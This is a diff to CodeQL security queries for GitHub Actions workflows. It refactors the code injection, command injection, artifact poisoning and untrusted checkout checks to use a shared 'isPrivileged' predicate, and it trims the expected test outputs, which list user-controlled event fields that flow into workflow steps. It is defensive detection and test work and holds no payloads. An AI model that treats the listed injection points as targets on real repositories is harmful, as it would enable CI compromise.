@@ -16,16 +16,13 @@ import actions import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Workflow w +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - not isSingleTriggerWorkflow(w, "pull_request") + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) select sink.getNode(), source, sink, "Potential privileged command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index f71c178822cb..dc28cc2569ff 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -19,7 +19,16 @@ import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink -where CodeInjectionFlow::flowPath(source, sink) +where + CodeInjectionFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql index 62030e322633..9814df091dd7 100644 
--- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -18,16 +18,13 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Workflow w +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - not isSingleTriggerWorkflow(w, "pull_request") + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) select sink.getNode(), source, sink, "Potential privileged code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 5b71a64d52e4..5d38faa94df5 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql 
@@ -14,27 +14,9 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from Workflow w, LocalJob job, ArtifactDownloadStep download, Step run +from LocalJob job, ArtifactDownloadStep download, Step run where - w = job.getWorkflow() and - ( - // The Workflow is triggered by an event other than `pull_request` - not isSingleTriggerWorkflow(w, "pull_request") - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - isSingleTriggerWorkflow(w, "workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = w.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - not isSingleTriggerWorkflow(caller, "pull_request") - ) - ) and + job.getWorkflow().isPrivileged() and (run instanceof Run or run instanceof UsesStep) and exists(int i, int j | job.getStep(i) = download and diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 86b80c672157..40f6d2fec9e6 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql 
@@ -121,26 +121,9 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { } } -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - from Workflow w, PRHeadCheckoutStep checkout where - ( - // The Workflow is triggered by an event other than `pull_request` - not isSingleTriggerWorkflow(w, "pull_request") - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - isSingleTriggerWorkflow(w, "workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = w.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - not isSingleTriggerWorkflow(caller, "pull_request") - ) - ) and + w.isPrivileged() and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 2d96ec5a4352..d5dbcbde0869 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -3,4 +3,3 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | 
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected index decabad082fb..99ebb1edc05d 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected @@ -3,4 +3,3 @@ nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 1fad288860e7..6cb2c1ed3992 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -209,92 +209,5 @@ nodes | action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
